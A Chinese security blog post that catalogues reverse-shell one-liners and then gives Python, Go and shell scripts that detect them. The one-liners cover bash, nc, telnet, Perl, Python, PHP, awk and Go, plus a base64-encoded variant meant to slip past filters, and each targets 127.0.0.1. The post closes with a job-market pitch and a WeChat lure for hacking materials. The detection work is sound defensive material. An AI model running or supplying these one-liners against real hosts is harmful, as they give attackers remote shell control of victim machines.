反弹shell检测的一些思路

前言

反弹shell是攻击者常用的手段之一，通过反弹Shell，攻击者可以绕过防火墙，获取目标系统的shell访问权限，进行后续的恶意操作。因此，及时检测并阻止反弹Shell行为对于安全防护来说非常重要。本文通过介绍反弹shell的常用手段，探讨检测的思路以及简单的代码实现。

反弹shell

基本概念

反弹shell常用于防火墙或网络策略仅允许出站连接，并限制未授权的入站连接的情景。利用允许出站后门连接的这一点，攻击者可以绕过通过基于入站规则的网络防护，从而远程控制目标计算机。

举个例子，在一台目标Linux系统上，攻击者可能会利用某个漏洞执行如下命令，使目标机创建一个反弹Shell到攻击者的服务器：

bash -i >& /dev/tcp/ip/端口 0>&1 

在这个命令中：

• bash -i表示启动一个交互式的bash终端。

• >& /dev/tcp/攻击者的IP地址/端口 这一部分使得bash通过TCP连接与攻击者的IP地址和端口通信。

0>&1将标准输入（0）重定向到标准输出（1），确保输入和输出都通过网络连接。

反弹Shell的本质是一种网络连接的反转操作，将命令行界面从远程系统重定向回攻击者的控制终端。

常用手法

Bash

监听：nc -lvvp 2333
连接：bash -i >& /dev/tcp/127.0.0.1/2333 0>&1  #TCP

执行效果如下：

可以看到命令执行完之后，创建了一个常住进程bash -i， 它的0和1文件描述符都指向socket。

监听：nc -u -lvp 2333
连接：sh -i >& /dev/udp/127.0.0.1/2333 0>&1 

执行效果如下：

可以看到，执行完创建了一个常住进程sh -i， 它的的0和1文件描述符都指向socket。

0<&196;exec 196<>/dev/tcp/127.0.0.1/2333; sh <&196 >&196 2>&196

执行效果如下：

可以看到，执行完创建了sh进程，0和1描述符都指向了socket。

exec 5<>/dev/tcp/127.0.0.1/2333; while read line 0<&5; do $line 2>&5 >&5; done

执行效果如下：

可以看到创建了sh进程，0和1描述符都指向了socket。

nohup bash -c 'bash -i >& /dev/tcp/127.0.0.1/2333 0>&1'

base64转一下试试呢

echo "nohup bash -c 'bash -i >& /dev/tcp/127.0.0.1/2333 0>&1'" | base64 -w0
echo bxx(说是敏感词，自己转一下哈)odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMjMzMyAwPiYxJwo= | base64 -d | bash 2>/dev/null

执行效果如下：

可以看到创建了bash进程，0和1描述符都指向了socket。

nc

nc -e /bin/sh 127.0.0.1 2333
如果nc 不支持 -e
nc  127.0.0.1 2333 | /bin/sh #Blind
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc  127.0.0.1 2333 1>/tmp/bkpipe
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc  127.0.0.1 2333 >/tmp/f

执行完之后，可以看到目标机创建了sh进程，0和1描述符都指向了pipe，这两个pipe关联到文件和nc上。nc创建了socket外联。如图所示：

Telnet

当/dev/tcp不可用，且目标主机和攻击机上支持Telnet服务时，可以使用Telnet反弹shell。

基础的命令

telnet 127.0.0.1 2333 | /bin/sh 

执行效果如下：

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 127.0.0.1 2333 >/tmp/f
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet 127.0.0.1 2333 1>/tmp/bkpipe

可以看到以上的执行完了之后，都创建了sh进程，0和1描述符都指向了pipe。

telnet 127.0.0.1 2333 | /bin/bash | telnet 127.0.0.1 1234

这个创建了bash进程，0和1描述符都指向了pipe。

Perl

perl -e 'use Socket;$i="127.0.0.1";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[127.0.0.1]:[2333]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

执行效果如下：

 

执行完之后创建了sh进程，0和1描述符都指向了socket。

Python

export RHOST="127.0.0.1";export RPORT=2333;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

执行效果如下：

目标机创建了sh进程，0和1描述符都指向了socket。

php

php -r '$sock=fsockopen("127.0.0.1",2333);exec("/bin/sh -i <&3 >&3 2>&3");'

执行效果如下：

执行完之后，目标机上创建了sh进程，0和1描述符都指向了socket。

Awk

awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/2333"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

执行效果如下：

创建了一个常住进程sh， 它的的0和1文件描述符都指向socket。

Golang

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:2333");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

目标机执行后的结果如下：

创建了sh进程，0和1描述符都指向了pipe。

介于篇幅考虑，Java，Nodejs，openssl，Metasploit，lua，Ruby等，我这就不演示了哈。

大家可以去试一下，你会发现shell环境（包括sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash）的进程0和1（或某一个）文件描述符都关联到socket或者pipe。

检测思路

通过上面的演示中，归纳起来，shell环境的进程如果0和1（或某一个）文件描述符都关联到socket或者pipe，就认为它是反弹shell。

通过检查进程的文件描述符0（标准输入）和1（标准输出），是否都被关联到了socket或者pipe，如果是，则认为是反弹shell行为。

基本实现

Python

import os

def is_socket_or_pipe(fd_path):
if os.path.exists(fd_path):
if os.path.islink(fd_path):
fd_target = os.readlink(fd_path)
return 'socket:' in fd_target or 'pipe:' in fd_target
return False

def get_process_details(pid):
process_details = {'pid': pid}

cmdline_path = f'/proc/{pid}/cmdline'
environ_path = f'/proc/{pid}/environ'
status_path = f'/proc/{pid}/status'

# 读取进程的命令行信息
try:
with open(cmdline_path, 'r') as cmdline_file:
cmdline = cmdline_file.read()
cmdline = cmdline.replace('\x00', ' ').strip()  # cmdline参数是以\x00分隔的
process_details['cmdline'] = cmdline
except Exception:
process_details['cmdline'] = 'Unavailable'

# 读取进程的环境变量
try:
with open(environ_path, 'r') as environ_file:
environ = environ_file.read()
environ = environ.replace('\x00', ', ').strip()  # 环境变量以\x00分隔
process_details['environ'] = environ
except Exception:
process_details['environ'] = 'Unavailable'

# 读取进程状态信息，如名称、状态等
try:
with open(status_path, 'r') as status_file:
status_lines = status_file.readlines()
for line in status_lines:
if line.startswith('Name:') or line.startswith('State:'):
key, value = line.split(':')
process_details[key.strip().lower()] = value.strip()
except Exception:
process_details['name'] = 'Unavailable'
process_details['state'] = 'Unavailable'

return process_details

def check_all_processes_for_reverse_shell():
for pid in os.listdir('/proc'):
if pid.isdigit():
fd_dir = f'/proc/{pid}/fd'
stdin_fd = f'{fd_dir}/0'
stdout_fd = f'{fd_dir}/1'

try:
stdin_is_socket_or_pipe = is_socket_or_pipe(stdin_fd)
stdout_is_socket_or_pipe = is_socket_or_pipe(stdout_fd)

if stdin_is_socket_or_pipe and stdout_is_socket_or_pipe:
details = get_process_details(pid)
print(f"Process {pid} 可能存在反弹shell:\n{details}\n")
except FileNotFoundError:
continue
except PermissionError:
continue

if __name__ == '__main__':
check_all_processes_for_reverse_shell()

运行效果：

Golang

package main

import (
"fmt"
"os"
"path/filepath"
"strconv"
"strings"
)

type ProcessInfo struct {
PID     string
Command string
}

func main() {
processList := GetProcessList()
for _, process := range processList {
if isReboundShell(process.PID) {
fmt.Printf("Rebound Shell Detected: %+v\n", process)
}
}
}

func GetProcessList() []ProcessInfo {
processPath := "/proc"
processDirs, err := os.ReadDir(processPath)
if err != nil {
fmt.Printf("Error reading /proc: %s\n", err)
return nil
}

processList := make([]ProcessInfo, 0, len(processDirs))
for _, dir := range processDirs {
if !dir.IsDir() {
continue
}
pidStr := dir.Name()
_, err := strconv.Atoi(pidStr)
if err != nil {
continue
}

command := readCmdlineFile(pidStr)

p := ProcessInfo{
PID:     pidStr,
Command: command,
}

processList = append(processList, p)
}

return processList
}

func readCmdlineFile(pidStr string) string {
cmdlineFile := filepath.Join("/proc", pidStr, "cmdline")
cmdlineBytes, err := os.ReadFile(cmdlineFile)
if err != nil {
return ""
}
cmdline := strings.ReplaceAll(string(cmdlineBytes), string(0), " ")
return strings.TrimSpace(cmdline)
}

func isReboundShell(pidStr string) bool {
fd0Path := filepath.Join("/proc", pidStr, "fd", "0")
fd1Path := filepath.Join("/proc", pidStr, "fd", "1")

fd0Target, err0 := os.Readlink(fd0Path)
fd1Target, err1 := os.Readlink(fd1Path)

if err0 != nil || err1 != nil {
return false
}

if (strings.HasPrefix(fd0Target, "socket:") || strings.HasPrefix(fd0Target, "pipe:")) &&
(strings.HasPrefix(fd1Target, "socket:") || strings.HasPrefix(fd1Target, "pipe:")) {
return true
}

return false
}

运行效果

Shell

#!/bin/bash

# 检查每个进程的文件描述符
for pid in $(ps -e | awk '{if(NR>1) print $1}'); do
# 忽略不存在的进程的错误信息
if [ ! -d /proc/$pid ]; then
continue
fi

# 检查标准输入 (fd 0)
fd0=$(ls -l /proc/$pid/fd/0 2>/dev/null)
# 检查标准输出 (fd 1)
fd1=$(ls -l /proc/$pid/fd/1 2>/dev/null)

# 使用grep检查fd是否是socket或pipe
if echo "$fd0" | grep -qE 'socket|pipe'; then
if echo "$fd1" | grep -qE 'socket|pipe'; then
echo "可能的反弹Shell进程: PID=$pid"
# 使用tr命令替换空字符为一个空格
cmdline=$(tr '\0' ' ' < /proc/$pid/cmdline)
echo "命令行: $cmdline"
fi
fi
done

运行效果

题外话

初入计算机行业的人或者大学计算机相关专业毕业生，很多因缺少实战经验，就业处处碰壁。下面我们来看两组数据：

• 2023届全国高校毕业生预计达到1158万人，就业形势严峻；
• 国家网络安全宣传周公布的数据显示，到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻，一方面是网络安全人才百万缺口。

6月9日，麦可思研究2023年版就业蓝皮书（包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》）正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中，本科计算机类专业起薪与2021届基本持平，高职自动化类月收入增长明显，2022届反超铁道运输类专业（5295元）排在第一位。

具体看专业，2022届本科月收入较高的专业是信息安全（7579元）。对比2018届，电子科学与技术、自动化等与人工智能相关的本科专业表现不俗，较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼，已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。

 “没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。 

网络安全行业特点

1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万！

 2、人才缺口大，就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表：我国网络空间安全人才 需求140万人，而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W，现在从事网络安全行业的从业人员只有10W人。

 行业发展空间大，岗位非常多

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升，所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟，升值空间一路看涨，这也是为什么受大家欢迎的主要原因。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

 1.学习路线图 

 攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

 

 （都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。 

  因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。 

 还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取

 最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

 因篇幅有限，仅展示部分资料，需要保存下方图片，微信扫码即可前往获取